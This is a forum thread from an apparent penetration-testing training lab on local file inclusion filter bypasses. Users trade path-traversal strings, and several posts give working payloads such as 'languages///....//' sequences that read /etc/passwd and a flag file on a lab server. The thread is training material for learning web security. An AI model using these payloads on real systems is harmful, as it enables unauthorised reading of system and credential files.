FILE INCLUSION - Basic Bypasses Question

Hello there,

I tryed all of below both URL encoded and clear.
What i do wrong ?

languages/es.php

./languages/…/…/…/…/…/es.php

…//languages/es.php

…//languages/…/…/…/…/etc/passwd

RandomAndNonRandomName/…/…/…/etc/passwd/././././././././././.(2048 thing. Goes and goes.)

./languages/…/…/…/…/…/flag.txt%00

…//languages/…/…/…/…/…/flag.txt

languages/…/…/…/…/…/flag.txt%00

./languages/…/…/…/…/…/flag.txt%00

languages/…/…/…/…/…/flag.txt

.\languages..........\flag.txt%00

languages/…/…/…/…/…/flag.txt%00

./languages/etc/passwd%00

1 Like

There are three dots ... between the slashes, but Unix use two dots as parent directory name ..

There was two before i post.
It changed to three after i posted

@xtal have any idea ?.

Sorry. No specific idea.

The three points were an obvious error. But it was just an error in presentation, not the real error.

I would start with ./../etc/passwd and then insert more /../ until I can access the passwd file. You know absolute path and filename of the passwd file so I would try to access this file first. If you are on a unix machine there will be the file /etc/passwd.

Well… Still could’t resolve it.

Hey,
Did you slved?
I have 3 days trying…

I did everything in the training page but couldnt solve…

Does anybody have a solution to this?
I went through the cheat sheet, encoded, than double encoded all of the examples still unable to open the passwd file not to mention the actual task.

1 Like

When you guys first visit a page the parameter includes ‘languages/page/’. What if the code checks if parameter contains ‘languages’? :thinking:

If you want PM me, I can provide automatic tool that solves lfi automatically.

This one works.

http://206.189.124.56:32620/index.php?language=languages///....//....//....//....//....//....//.....//....//....//....//etc/passwd

5 Likes

Thank you, it works indeed!

1 Like
languages///....//....//....//.....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
1 Like

One way I found out was to try and get back to the original file to make sure I had the encoding correct for example:

languages/....//languages/en.php

Should take you back to the en.php page.
From there, I changed en.php to flag.txt

languages/....//flag.txt

Then it’s just a guessing game on how many ....// you need to add.
Unless there is a specific way to find out how many …// ?
I was confused though because I thought the flag file was in the languages directory since it said /flag.txt

1 Like

any hints on how to solve this ?

language=languages//....//....//....//....//flag.txt

worked for me

1 Like

Hint: If the path doesn’t work right away, try adding more ....// to go further up the directory structure. Just make sure to keep languages in the path to bypass any filters. Feel free to DM me if you need a hint — I’ll try to respond as quickly as I can good luck!